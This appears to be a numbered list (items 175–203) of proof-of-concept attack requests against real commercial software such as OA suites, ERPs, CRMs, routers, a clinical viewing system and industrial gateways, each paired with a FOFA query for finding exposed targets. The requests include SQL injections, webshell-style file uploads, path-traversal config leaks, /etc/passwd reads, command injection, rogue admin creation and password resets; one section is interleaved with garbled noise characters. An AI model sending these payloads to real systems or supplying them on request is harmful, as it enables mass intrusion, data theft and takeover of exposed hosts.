User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--
4 _2 @' j- n0 w7 H# L, Q$ X
" E) Z8 Y# W$ m8 M$ n177. H3C路由器敏感信息泄露
1 ]+ x' j7 ?9 a/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
$ K8 Y$ j7 i2 `- Q! g |0 L) @- q/userLogin.asp/../actionpolicy_status/../M60.cfg" |' |8 l' ~6 Z6 E0 O/ K
/userLogin.asp/../actionpolicy_status/../GR8300.cfg' P! ?/ d( e @* Z/ t0 i9 K3 \
/userLogin.asp/../actionpolicy_status/../GR5200.cfg! `+ K4 X6 z2 s: r: o6 F
/userLogin.asp/../actionpolicy_status/../GR3200.cfg0 D; q: N. R9 [2 y( Q2 D, C# X
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
9 o$ y, G0 T c( V0 \6 k/ b/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' ~- }. |1 T3 T. ?/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg- r7 |8 _ w. `, W+ |$ K
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
& c$ ^; c/ ?+ y3 A2 H/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" Q: S/ @. ?: O* y+ I1 |/userLogin.asp/../actionpolicy_status/../ER5200.cfg% m5 k1 W- G( z B/ \
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
0 b3 P8 D8 N) q4 \/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
2 _9 k7 H/ D6 u* a/userLogin.asp/../actionpolicy_status/../ER3260.cfg4 _/ ]4 k4 |0 E$ f' E( ?9 v
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
9 e# N# _& s) U/userLogin.asp/../actionpolicy_status/../ER3200.cfg
+ C) }$ Y( P1 D% Y6 g# }/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg0 k- K9 ~% m f$ Q7 M: j
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
8 [% @$ _9 j8 z/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg7 V- h7 h4 T* Y& P5 X% w9 I4 i
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
2 V* }1 B- x- r* {& i/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg7 j" u# C9 F7 D# X$ x" U6 U" C5 H
: X [- i' {+ r# a* {' x! E
178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The stored file name comes from the part's name attribute; verify with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 library cluster management system (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is the SQL statement itself; the endpoint executes it as posted.

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Stacked query: the hex decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); which INTO OUTFILE writes to WebRoot\plom.xgi, so the injection turns into a file write.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

The RANDOMBLOB payload is the SQLite heavy-query delay, the equivalent of SLEEP for a database without one.

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi parameter is fetched as a URL, so a file:// scheme reads local files.

191. 亿赛通电子文档安全管理系统 (electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 (Hillstone 云鉴 security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerable endpoint is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (internet behaviour management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain a session cookie, then upload the file and request it to confirm the result:

GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 (video management system) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder all-media news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--